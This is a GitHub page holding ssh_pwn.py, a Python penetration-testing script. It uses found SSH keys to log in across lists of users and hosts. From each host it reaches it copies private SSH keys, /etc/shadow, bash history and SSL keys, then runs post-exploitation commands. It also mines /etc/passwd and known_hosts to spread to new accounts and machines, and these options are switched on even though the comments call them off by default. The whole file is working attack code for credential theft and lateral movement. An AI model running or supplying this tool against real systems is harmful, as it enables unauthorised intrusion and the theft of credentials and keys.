forked from averagesecurityguy/scripts
-
Notifications
You must be signed in to change notification settings - Fork 1
/
ssh_pwn.py
executable file
·397 lines (344 loc) · 12.2 KB
/
ssh_pwn.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2013, AverageSecurityGuy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of AverageSecurityGuy nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
import os
import re
class ssh:
def __init__(self, user, key, host):
self.__user = user
self.__key = key
self.__host = host
# Can we authenticate successfully?
if self.run_ssh_command('ls') is None:
self.authenticated = False
else:
self.authenticated = True
# Can we sudo?
if self.run_ssh_command('sudo ls') is None:
self.sudo = False
else:
self.sudo = True
def run_ssh_command(self, command, admin=False):
'''
Run the specified command. If there is an error return None. If not,
return the response.
'''
if admin is True and self.__user != 'root':
if self.sudo is True:
command = 'sudo ' + command
else:
print '[-] Admin command failed, user is not root and cannot sudo.'
return None
cmd = 'ssh -i {0} {1}@{2} "{3}"'.format(self.__key,
self.__user, self.__host, command)
output = os.popen4(cmd)
resp = output[1].read()
# Check for common errors and return None
if resp.find('Permission denied') != -1:
return None
if resp.find('not a regular file') != -1:
return None
if resp.find('Please login as the user') != -1:
return None
if resp.find('Could not resolve hostname') != -1:
return None
if resp.find('usage: ssh') != -1:
return None
if resp.find('No such file or directory') != -1:
return None
# If no errors then return output of command
return resp
def __download_file(self, src, dst, admin=False):
'''
Download the src file and save it to disk as dst.
'''
print '[*] Downloading {0} from {1}'.format(src, self.__host)
resp = self.run_ssh_command('cat {0}'.format(src), admin)
if resp is None:
print '[-] Unable to download file'
return False
else:
dfile = open(dst, 'w')
dfile.write(resp)
dfile.close()
print '[+] File successfully downloaded.'
return True
def get_users(self):
'''
Read and parse the /etc/passwd file to get new user accounts.
'''
print '[*] Getting additional users.'
users = []
resp = self.run_ssh_command('cat /etc/passwd')
if resp is None:
return []
for line in resp.split('\n'):
u = line.split(':')[0]
users.append(u)
return users
def get_hosts(self):
'''
Read and parse the .ssh/known_hosts file to get new hosts.
'''
print '[*] Getting additional hosts.'
hosts = []
resp = self.run_ssh_command('cat .ssh/known_hosts')
if resp is None:
return []
for line in resp.split('\n'):
h = line.split(' ')[0]
hosts.append(h)
return hosts
def get_shadow(self):
'''
Get the /etc/shadow file and save it to disk. Will only work if we
are root or have sudo ability.
'''
print '[*] Getting shadow file from {0}.'.format(self.__host)
dst = '{0}_shadow'.format(self.__host)
self.__download_file('/etc/shadow', dst, True)
def get_history(self):
'''
Get the .bash_history file and save it to disk.
'''
print '[*] Getting Bash history file from {0}.'.format(self.__host)
dst = '{0}_{1}_history'.format(self.__host, self.__user)
self.__download_file('.bash_history', dst, True)
def get_ssl_keys(self):
'''
Download any private SSL keys. Look in the directory specified by
OPENSSLDIR in the output of the 'openssl version -a' command. only
download .crt and .key files. Requires root or sudo.
'''
print '[*] Getting SSL keys, if any, from {0}'.format(self.__host)
ssldir = None
resp = self.run_ssh_command('openssl version -a')
if resp is not None:
m = re.search(r'OPENSSLDIR: "(.*)"', resp)
if m is not None:
ssldir = m.group(1) + '/certs'
else:
print '[-] No SSL directory found.'
if ssldir is not None:
print '[+] Searching for SSL keys in {0}.'.format(ssldir)
resp = self.run_ssh_command('ls {0}'.format(ssldir), True)
if resp is not None:
for line in resp.split('\n'):
if line.find('.crt') != -1 or line.find('.key') != -1:
src = ssldir + '/' + line
dst = '{0}_{1}'.format(self.__host, line)
self.__download_file(src, dst, True)
else:
print '[-] No SSL keys were found.'
def get_ssh_keys(self):
'''
Download the SSH keys in the .ssh directory. Return the list of keys
found.
'''
print '[*] Getting additional SSH keys from {0}'.format(self.__host)
keys = []
resp = self.run_ssh_command('ls .ssh')
for line in resp.split('\n'):
if line == 'authorized_keys':
continue
if line == 'known_hosts':
continue
if line == 'config':
continue
if line == '':
continue
src = '.ssh/{0}'.format(line)
dst = '{0}_{1}_{2}_sshkey'.format(self.__host, self.__user,
line)
if self.__download_file(src, dst) is True:
keys.append(line)
return keys
def audit_ssh(user, key, host):
'''
Audit an SSH server. Attempt to authenticate to the host using the user
and key provided. Attempt to get SSH keys, shadow file, bash_history and
SSL private keys. Also add new users and hosts if allowed.
'''
print '[*] Auditing {0}@{1} with {2}.'.format(user, host, key)
server = ssh(user, key, host)
if server.authenticated is True:
keys.extend(server.get_ssh_keys())
if add_users is True:
add_new_users(server.get_users())
if add_hosts is True:
add_new_hosts(server.get_hosts())
server.get_shadow()
server.get_history()
server.get_ssl_keys()
run_post_exploitation(server)
else:
print '[-] Unable to login to server.'
def add_new_users(new_users):
'''
Add new users to the global users list unless already in the list.
'''
for user in new_users:
if user in users:
continue
if user in default_users:
continue
if user == '':
continue
print '[+] Found new user {0}.'.format(user)
users.append(user)
def add_new_hosts(new_hosts):
'''
Add new hosts to the global hosts list unless already in the list.
'''
for host in new_hosts:
if host in hosts:
continue
if host == '':
continue
print '[+] Found new host {0}.'.format(host)
hosts.append(host)
def run_post_exploitation(server):
'''
Run post exploitation commands on the server and capture the responses
in the 'postexploit' file. Failed commands are attempted with sudo if the
user is not root.
'''
print '[*] Running post exploitation commands.'
pe = open('postexploit', 'w')
for cmd in post_exploit:
print '[*] Running command {0}.'.format(cmd)
pe.write(cmd + '\n')
resp = server.run_ssh_command(cmd)
if resp is None:
print '[-] Command failed trying with sudo.'
resp = server.run_ssh_command(cmd, True)
if resp is not None:
print '[+] Command successful.'
pe.write(resp + '\n')
else:
print '[-] Command unsuccessful.'
pe.write('\n')
else:
print '[+] Command successful.'
pe.write(resp + '\n')
pe.close()
def load_keys():
'''
Load SSH keys from the current directory.
'''
keys = []
print '[*] Loading SSH keys from current directory.'
for file in os.listdir('.'):
if file.endswith('.pub'):
continue
if file == 'users':
continue
if file == 'hosts':
continue
if file == 'postexploit':
continue
if file.endswith('_shadow'):
continue
if file.endswith('_sshkey'):
continue
if file.endswith('_history'):
continue
if file == os.path.basename(__file__):
continue
keys.append(file)
return keys
def load_users():
'''
Load user accounts from the 'users' file.
'''
u = []
print '[*] Loading user accounts.'
for line in open('users', 'r'):
if line == '\n':
continue
u.append(line.rstrip())
return u
def save_users():
'''
Update the 'users' file with the newly discovered users if allowed.
'''
print '[*] Saving user accounts.'
u = open('users', 'w')
u.write('\n'.join(users))
u.close()
def load_hosts():
'''
Load hostnames/IPs from the 'hosts' file.
'''
h = []
print '[*] Loading hosts.'
for line in open('hosts', 'r'):
if line == '\n':
continue
h.append(line.rstrip())
return h
def save_hosts():
'''
Update the 'hosts' file with newly discovered hosts, if allowed.
'''
print '[*] Saving hosts.'
h = open('hosts', 'w')
h.write('\n'.join(hosts))
h.close()
# Main Program
if __name__ == '__main__':
'''
CONFIGURATION OPTIONS
Auto adding users and hosts can cause you to audit users or hosts that
are not in scope. By default these are set to False. If you don't care,
then set them to True.
post_exploit contains a list of commands to run on any SSH servers to
which we have access.
default_users is a list of default user accounts that will not be added
to the list of users if found on a server.
'''
add_users = True
add_hosts = True
post_exploit = ['ls /home']
default_users = ['daemon', 'bin', 'sys', 'sync', 'games', 'man', 'lp',
'mail', 'news', 'uucp', 'proxy', 'www-data', 'backup',
'list', 'irc', 'gnats', 'nobody', 'libuuid', 'syslog',
'messagebus', 'whoopsie', 'landscape', 'sshd']
users = load_users()
hosts = load_hosts()
keys = load_keys()
print '[*] Starting SSH audit.'
for key in keys:
for user in users:
for host in hosts:
audit_ssh(user, key, host)
if add_users is True:
save_users()
if add_hosts is True:
save_hosts()